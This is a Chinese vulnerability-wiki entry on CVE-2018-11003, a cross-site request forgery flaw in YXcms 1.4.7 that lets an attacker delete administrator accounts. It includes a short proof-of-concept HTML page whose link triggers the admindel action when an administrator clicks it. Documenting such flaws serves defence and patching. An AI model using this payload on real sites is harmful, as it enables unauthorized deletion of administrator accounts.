menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right YXcms chevron_right (CVE-2018-11003)YXcms 1.4.7跨站请求伪造漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2018-11003)YXcms 1.4.7跨站请求伪造漏洞.md
    616 B / 2021-04-21 09:23:46
        (CVE-2018-11003)YXcms 1.4.7 跨站请求伪造漏洞
    ==============================================
    
    一、漏洞简介
    ------------
    
    YXcms
    1.4.7版本中的protected/apps/admin/controller/adminController.php文件存在跨站请求伪造漏洞。远程攻击者可借助index.php?r=admin/admin/admindel利用该漏洞删除管理员账户。
    
    二、漏洞影响
    ------------
    
    YXcms 1.4.7
    
    三、复现过程
    ------------
    
    POC:
    
    管理员点击链接
    
    <http://192.168.232.133/evil.html>
    
    evil.html
    
        <html> 
        <a href="http://127.0.0.1/yxcms1.4.7/index.php?r=admin/admin/admindel&id=1">test</a>
        </html>
    
    
    links
    file_download